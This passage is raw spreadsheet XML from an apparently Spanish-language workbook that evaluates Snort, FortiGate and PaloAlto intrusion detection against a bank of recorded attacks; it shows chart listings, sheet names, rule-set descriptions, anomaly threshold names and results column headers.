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ms-office.chartex+xml" PartName="/xl/charts/chartEx1.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ms-office.chartstyle+xml" PartName="/xl/charts/style1.xml"/>
  <Override ContentType="application/vnd.ms-office.chartcolorstyle+xml" PartName="/xl/charts/colors1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart7.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart27.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart104.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart43.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart120.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart78.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart35.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart112.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart61.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart130.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart94.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart122.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart17.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart25.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart68.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart51.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart86.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart29.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart20.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart33.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart63.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart127.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart76.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart114.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart129.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart58.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart45.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart15.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart132.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart102.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart92.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart5.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart88.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart57.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart109.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart14.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart74.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart31.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart116.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart2.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart47.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart72.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart91.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart118.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart55.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart81.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart126.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart12.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart21.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart64.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart38.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart100.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart98.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart85.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart53.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart10.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart83.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart111.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart66.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart124.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart70.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart40.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart96.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart107.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart49.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart9.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart19.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart79.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart23.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart36.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart52.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart18.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart95.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart44.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart121.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart87.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart103.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart26.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart77.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart105.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart34.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart8.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart69.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart42.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart113.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart60.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart16.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart89.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart59.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart46.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart131.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart50.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart4.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart93.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart101.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart28.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart6.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart80.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart133.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart62.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart32.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart75.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart115.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart128.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart65.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart90.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart117.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart82.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart30.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart13.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart125.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart39.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart48.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart22.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart56.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart108.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart99.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart73.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart3.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart41.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart11.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart84.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart71.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart123.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart54.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart97.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart106.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart37.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart67.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart110.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart24.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart1.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart+xml" PartName="/xl/charts/chart119.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1) - Reglas Usadas" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="(A.2) - Configuración de FG  PA" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="(B) - Detecciones - Ataques" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="(C) - Detecciones - Tráfico Leg" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="(D) - Análisis Resultados I - S" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="(D) - Análisis Resultados II - " sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="(D) - Análisis Resultados III -" sheetId="7" r:id="rId10"/>
    <sheet state="visible" name="(D) - Análisis Resultados IV - " sheetId="8" r:id="rId11"/>
    <sheet state="visible" name="(E) - Referencias" sheetId="9" r:id="rId12"/>
    <sheet state="visible" name="(F) - Leyenda" sheetId="10" r:id="rId13"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="18392" uniqueCount="3012">
  <si>
    <t>SNORT</t>
  </si>
  <si>
    <t>Nombre REGLA</t>
  </si>
  <si>
    <t>Descripción</t>
  </si>
  <si>
    <t>Nº de Reglas</t>
  </si>
  <si>
    <t>Versión</t>
  </si>
  <si>
    <t>Fecha</t>
  </si>
  <si>
    <t>RS1</t>
  </si>
  <si>
    <t>RS2</t>
  </si>
  <si>
    <t>RS3</t>
  </si>
  <si>
    <t>RS4</t>
  </si>
  <si>
    <t>Talos Community</t>
  </si>
  <si>
    <t>Las "Talos Community Rules" o reglas de la Comunidad han sido creadas por miembros de la comunidad de código abierto o integrantes de Snort. Estas reglas están disponibles para todos los usuarios de Snort y están controladas por GPLv2. Constituye un subconjunto de las Reglas "Talos Registered".</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>✔</t>
  </si>
  <si>
    <t>Talos Registered</t>
  </si>
  <si>
    <t>El paquete de reglas "Talos Registered" contiene más reglas que el paquete "Talos Community". Su naturaleza es similar.</t>
  </si>
  <si>
    <t>ETOpen</t>
  </si>
  <si>
    <t>Conjunto de reglas "Emerging Threats" alternativas a las reglas ofrecidas por Snort, pero igualmente compatibles. Este paquete constituye un subconjunto de las reglas optimizadas Emerging Threats (ETOpen Optimizada).</t>
  </si>
  <si>
    <t>ETOpen Optimizada</t>
  </si>
  <si>
    <t>Paquete de todas las reglas ofrecidas por Emerging Threats.</t>
  </si>
  <si>
    <t>FORTIGATE</t>
  </si>
  <si>
    <t>Nombre Reglas</t>
  </si>
  <si>
    <t>IPS Definitions</t>
  </si>
  <si>
    <t>IPS Engine</t>
  </si>
  <si>
    <t>Dispositivo</t>
  </si>
  <si>
    <t>FortiGate</t>
  </si>
  <si>
    <t>FortiGate dispone de un conjunto de reglas internas que se van actualizando conforme se van exportando nuevas versiones completas del producto</t>
  </si>
  <si>
    <t>Version 28.00837</t>
  </si>
  <si>
    <t>Version 7.00539</t>
  </si>
  <si>
    <t>FGVM02</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>PALOALTO NGFW</t>
  </si>
  <si>
    <t>PaloAlto</t>
  </si>
  <si>
    <t>PaloAltodispone de un conjunto de reglas internas que se van actualizando conforme se van exportando nuevas versiones completas del producto</t>
  </si>
  <si>
    <t>UMBRALES FUERZA BRUTA</t>
  </si>
  <si>
    <t>Threshold / Contador</t>
  </si>
  <si>
    <t>Duration (seconds)</t>
  </si>
  <si>
    <t>Action</t>
  </si>
  <si>
    <t>Monitor</t>
  </si>
  <si>
    <t>UMBRALES DOS</t>
  </si>
  <si>
    <t>L3 Anomalies</t>
  </si>
  <si>
    <t>Concepto</t>
  </si>
  <si>
    <t>ip_src_session</t>
  </si>
  <si>
    <t>ip_dst_session</t>
  </si>
  <si>
    <t>L4 Anomalies</t>
  </si>
  <si>
    <t>tcp_syn_flood</t>
  </si>
  <si>
    <t>tcp_port_scan</t>
  </si>
  <si>
    <t>tcp_src_session</t>
  </si>
  <si>
    <t>tcp_dst_session</t>
  </si>
  <si>
    <t>udp_flood</t>
  </si>
  <si>
    <t>udp_scan</t>
  </si>
  <si>
    <t>udp_src_session</t>
  </si>
  <si>
    <t>udp_dst_session</t>
  </si>
  <si>
    <t>icmp_flood</t>
  </si>
  <si>
    <t>icmp_sweep</t>
  </si>
  <si>
    <t>icmp_src_session</t>
  </si>
  <si>
    <t>icmp_dst_session</t>
  </si>
  <si>
    <t>sctp_flood</t>
  </si>
  <si>
    <t>sctp_scan</t>
  </si>
  <si>
    <t>sctp_src_session</t>
  </si>
  <si>
    <t>sctp_dst_session</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">¡ATENCIÓN! </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>Los umbrales se han configurado de forma que puedan saltar para todos los ataques disponibles en el banco de ataques (relacionados con Denegaciones de Servicio o Fuerza Bruta). Es posible que en algún ataque no relacionado con esta temática pueda saltar alguna de estas alertas. Si se sospecha que no están relacionadas o que han podido saltar a causa de este bajo umbral se recomienda, o eliminar manualmente las alertas de los logs, o ajustar los umbrales a valores más elevados antes de la detección de estos ataques. En caso de ataques masivos o inmanejables en los que se desconoce su naturaleza completa, se recomienda acudir al recuadro de abajo.</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">¡ATENCIÓN! </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>Los umbrales de Fuerza Bruta y Denegación de Servicio requieren de un tiempo de reseteo. Si entre detecciones no se espera suficiente tiempo pueden generarse alertas de esta índole erróneamente. Se recomienda, por tanto, esperar un tiempo de al menos 5 minutos entre ataques, para evitar influencia de uno sobre el otro.</t>
    </r>
  </si>
  <si>
    <t>PALOALTO</t>
  </si>
  <si>
    <t>TÁCTICA</t>
  </si>
  <si>
    <t>OTRAS TÁCTICAS</t>
  </si>
  <si>
    <t>ID TÁCTICA</t>
  </si>
  <si>
    <t>TÉCNICA</t>
  </si>
  <si>
    <t>ID TÉCNICA</t>
  </si>
  <si>
    <t>SUBTÉCNICA</t>
  </si>
  <si>
    <t>ID SUBTÉCNICA</t>
  </si>
  <si>
    <t>ATAQUE</t>
  </si>
  <si>
    <t>HERRAMIENTA</t>
  </si>
  <si>
    <t>FICHERO PCAP</t>
  </si>
  <si>
    <t>PROTOCOLO BASE DE ATAQUE</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS</t>
  </si>
  <si>
    <t>Nº DE FLUJOS CON ATAQUE/S</t>
  </si>
  <si>
    <t>Nº DE FLUJOS CON ATAQUE/S COLATERAL/ES</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TOTALES</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) PRINCIPALES</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) COLATERALES</t>
  </si>
  <si>
    <t>ATAQUE/S COLATERAL/ES - EXPLICACIÓN</t>
  </si>
  <si>
    <t>DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>MECANISMO DE DETECCIÓN</t>
  </si>
  <si>
    <t>DETALLES DE IMPLEMENTACIÓN DE ATAQUE</t>
  </si>
  <si>
    <t>PROCESO DE GENERACIÓN DE PCAP</t>
  </si>
  <si>
    <t>VALIDACIÓN DE PCAP</t>
  </si>
  <si>
    <t>ANÁLISIS DE DETECCIONES DE PCAP (Snort)</t>
  </si>
  <si>
    <t>FORMATO PCAPNG</t>
  </si>
  <si>
    <t>DETECTABILIDAD</t>
  </si>
  <si>
    <t>ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>VERIFICACIÓN MTU MÁXIMA</t>
  </si>
  <si>
    <t>ERROR TCP_REPLAY</t>
  </si>
  <si>
    <t>CONTIENE SÓLO FLUJOS COMPLETOS CON SYN INICIAL</t>
  </si>
  <si>
    <t>NIVEL DE ATAQUE (Contexto de Ataque)</t>
  </si>
  <si>
    <t>JUSTIFICACIÓN NIVEL DE ATAQUE (Contexto de Ataque)</t>
  </si>
  <si>
    <t>NIVEL DE ATAQUE (MODELO OSI)</t>
  </si>
  <si>
    <t>TRAMAS &gt; 4000 Bytes</t>
  </si>
  <si>
    <t>SIDs (sin repetición)</t>
  </si>
  <si>
    <t>#SIDs</t>
  </si>
  <si>
    <t>Número total de alertas</t>
  </si>
  <si>
    <t>SIDs en legítimo y ataque</t>
  </si>
  <si>
    <t>SIDs sólo en ataque - SIDs TP ( Automático)</t>
  </si>
  <si>
    <t>#SIDs TP (Automático)</t>
  </si>
  <si>
    <t>Nº total de alertas TP (Automático)</t>
  </si>
  <si>
    <t>SIDs FP (Manual)</t>
  </si>
  <si>
    <t>SIDs FP (Automático)</t>
  </si>
  <si>
    <t>SIDs FP</t>
  </si>
  <si>
    <t>SIDs FP "No Relacionados"</t>
  </si>
  <si>
    <t>SIDs FP "Eventos de Red"</t>
  </si>
  <si>
    <t>SIDs TP "Todas las Alertas" (Manual)</t>
  </si>
  <si>
    <t>SIDs TP "Algunas Alertas"(Manual)</t>
  </si>
  <si>
    <t>#SIDs TP (Manual)</t>
  </si>
  <si>
    <t>Nº Total de Alertas TP (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS DETECTADOS SNORTv3</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TOTALES DETECTADOS</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S COLATERAL TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>Nº DE MENSAJES DE RED CON ATAQUE/S TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN FLUJOS</t>
  </si>
  <si>
    <t>% DETECCIÓN FLUJOS TP (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN FLUJOS TP (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN MENSAJES</t>
  </si>
  <si>
    <t>%DETECCIÓN MENSAJES TP (Automático)</t>
  </si>
  <si>
    <t>%DETECCIÓN MENSAJES TP (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN INSTANCIAS</t>
  </si>
  <si>
    <t>% DETECCIÓN INSTANCIAS TP (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN INSTANCIAS TP (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN EFICAZ FLUJOS (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN EFICAZ ATAQUES (Manual)</t>
  </si>
  <si>
    <t>SIDs TP "Todas las Alertas"</t>
  </si>
  <si>
    <t>SIDs TP "Algunas Alertas"</t>
  </si>
  <si>
    <t>Nº total de alertas TP (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS DETECTADOS SNORTv2</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S DETECTADOS</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) DETECTADOS POR TALOS</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) DETECTADOS POR ETOPEN</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TOTALES DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S  COLATERAL TP DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS POR TALOS (Automático)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP DETECTADOS POR ETOPEN (Automático)</t>
  </si>
  <si>
    <t>Nº ATAQUES (INSTANCIAS) TP TOTALES DETECTADOS (Automático + Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP FLUJOS (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP FLUJOS (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP MENSAJES (Automático)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP MENSAJES (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN INSTANCIAS (Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP INSTANCIAS (Automático + Manual)</t>
  </si>
  <si>
    <t>% DETECCIÓN TP INSTANCIAS (Manual)</t>
  </si>
  <si>
    <t>SIDs TP "Algunas Alertas" (Manual)</t>
  </si>
  <si>
    <t>Nº TOTAL DE FLUJOS CON ATAQUE/S TP COLATERAL DETECTADOS (Manual)</t>
  </si>
  <si>
    <t>SIDs sólo en ataque - SIDs TP (Automático)</t>
  </si>
  <si>
    <t>ANÁLISIS MANUAL REALIZADO</t>
  </si>
  <si>
    <t>COMENTARIOS DE LAS DETECCIONES SNORT</t>
  </si>
  <si>
